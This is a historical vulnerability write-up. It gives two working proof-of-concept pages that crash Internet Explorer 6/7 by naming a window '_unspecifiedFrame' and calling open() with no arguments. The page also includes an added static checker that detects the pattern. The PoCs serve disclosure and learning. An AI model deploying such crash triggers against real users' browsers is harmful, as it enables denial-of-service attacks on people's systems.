Renaming an object window inside a dead htmlFile ActiveX to _unspecifiedFrame and then calling open() on it crashes IE6/7. The name _unspecifiedFrame is apparently an internal sentinel value, and calling open() without arguments on a window with that name triggers a code path that crashes.
Version using htmlFile ActiveX:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE>_unspecifiedFrame Crash</TITLE></HEAD>
<BODY>
<FONT SIZE="2" FACE="Verdana">
<B>Another IE6/7 Crash: if you call me "<FONT COLOR="BLUE">_unspecifiedFrame</FONT>" I will die for you :P</B><BR><BR>
1) Create an ActiveXObject("htmlFile") inside an IFRAME (ifr).<BR><BR>
2) Save a pointer (actX) to the ActiveX <U>outside the IFRAME</U>.<BR><BR>
3) Change the URL of the IFRAME, killing (in theory) the ActiveXObject.<BR><BR>
4) Write an OBJECT TYPE="text/html"(popByPass) inside the "dead" ActiveX.<BR><BR>
5) Change the name of the OBJECT (window) to <B>_unspecifiedFrame</B><BR><BR>
6) Call the open() method without parameters and... Crash! :|<BR><BR>
<INPUT TYPE="BUTTON" VALUE="Click Here to CrashMe" ONCLICK="openIt()">
<IFRAME NAME="ifr" STYLE="display:none;"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
ifr.execScript('parent.actX=new ActiveXObject("htmlFile");')
ifr.location.replace('about:blank');
function writeIt(){
  actX.write('<OBJECT ID="popByPass" WIDTH=10 HEIGHT=10 DATA="favicon.ico" TYPE="text/html"></OBJECT>');
  actX.close();
  // setTimeout('openIt()',1000);
}
function openIt(){
  // If we change it to a different name, it won't crash.
  actX.all.popByPass.object.parentWindow.name="_unspecifiedFrame";
  actX.all.popByPass.object.parentWindow.open();
}
setTimeout('writeIt()',1000);
</SCRIPT>
</BODY>
</HTML>
Variation using createPopup:
<iframe name="createPopup_Container"></iframe>
<script language="JavaScript">
function retCode(m){m+='';return m=m.substring(m.indexOf('{')+1,m.lastIndexOf('}'));}
function popUpCode()
{
  var objectWindow;
  function writeObjectAfterWeLeaveThePage()
  {
    try
    {
      var myParentDocument=parent.document;
      setTimeout('writeObjectAfterWeLeaveThePage()',100);
    }
    catch(e)
    {
      document.body.innerHTML='<object id="myObj" type="text/html" data="no_file_required.html"></object>';
      setTimeout('waitObjectToBeReady()',100);
    }
  }
  function waitObjectToBeReady()
  {
    try
    {
      objectWindow=document.all.myObj.object.parentWindow;
      openWindow();
    }
    catch(e)
    {
      setTimeout('waitObjectToBeReady()',100);
    }
  }
  function openWindow()
  {
    // If you comment the next line or if you use a different name other than _unspecifiedFrame, it won't Crash.
    objectWindow.execScript('window.name="_unspecifiedFrame"');
    objectWindow.open();
  }
  writeObjectAfterWeLeaveThePage();
}
createPopup_Container.document.write('<iframe src="nofile.html" width="100" height="100"></iframe>');
createPopup_Container.document.close();
var myPop=createPopup_Container.createPopup().document;
myPop.body.innerHTML='.<script defer="defer">'+retCode(popUpCode)+'<\/script>';
myPop.parentWindow.myPop=myPop;
setTimeout('createPopup_Container.location.replace("http://www.altavista.com/")',3000);
</script>
The string _unspecifiedFrame is used internally by IE to identify frames that haven’t been given an explicit name. Using it as an actual window name collides with that internal use, and calling open() without arguments on such a window triggers an unguarded code path.
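For anyone triaging archived pages or inspecting untrusted HTML for this pattern, here is an added example (not part of the original write-up) of a small static checker that flags the two ingredients described above: the reserved name "_unspecifiedFrame" being assigned as a window name, whether directly or inside an execScript string, followed by an argument-less open() call. The sample inputs are constructed from the two PoCs on this page; the reserved-name list and the function names are my own.

```javascript
// Added example: static detection of the _unspecifiedFrame + open() crash
// pattern in HTML/JS source. This is a content-inspection aid, not IE code.

// Only the sentinel this write-up documents; extend as needed (assumption).
const RESERVED_NAMES = ["_unspecifiedFrame"];

// `.name = "<value>"`, `window.name="<value>"`, or a NAME="..." attribute.
// Also matches the form embedded in an execScript('window.name=...') string.
const NAME_ASSIGN_RE = /\bname\s*=\s*(["'])([^"']*)\1/gi;
// A `.open()` call with no arguments (whitespace inside the parens allowed).
const EMPTY_OPEN_RE = /\.open\s*\(\s*\)/;

// Returns one finding per hit: { line, kind[, value] }, in source order.
function scanForUnspecifiedFrameCrash(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, idx) => {
    let m;
    NAME_ASSIGN_RE.lastIndex = 0;
    while ((m = NAME_ASSIGN_RE.exec(text)) !== null) {
      if (RESERVED_NAMES.includes(m[2])) {
        findings.push({ line: idx + 1, kind: "reserved-name-assignment", value: m[2] });
      }
    }
    if (EMPTY_OPEN_RE.test(text)) {
      findings.push({ line: idx + 1, kind: "argless-open-call" });
    }
  });
  return findings;
}

// Verdict: a reserved-name rename with an argument-less open() at or after it.
function isCrashPattern(source) {
  const findings = scanForUnspecifiedFrameCrash(source);
  const rename = findings.find(f => f.kind === "reserved-name-assignment");
  if (!rename) return false;
  return findings.some(f => f.kind === "argless-open-call" && f.line >= rename.line);
}

// Constructed samples, taken from the two PoCs above and a benign counterpart.
const SAMPLE_CRASH = 'actX.all.popByPass.object.parentWindow.name="_unspecifiedFrame";\n' +
                     'actX.all.popByPass.object.parentWindow.open();';
const SAMPLE_EXECSCRIPT = "objectWindow.execScript('window.name=\"_unspecifiedFrame\"');\n" +
                          'objectWindow.open();';
const SAMPLE_BENIGN = 'win.name="main";\nwin.open("about:blank","main");';

console.log(scanForUnspecifiedFrameCrash(SAMPLE_CRASH));
console.log(isCrashPattern(SAMPLE_CRASH), isCrashPattern(SAMPLE_EXECSCRIPT), isCrashPattern(SAMPLE_BENIGN));
```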
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.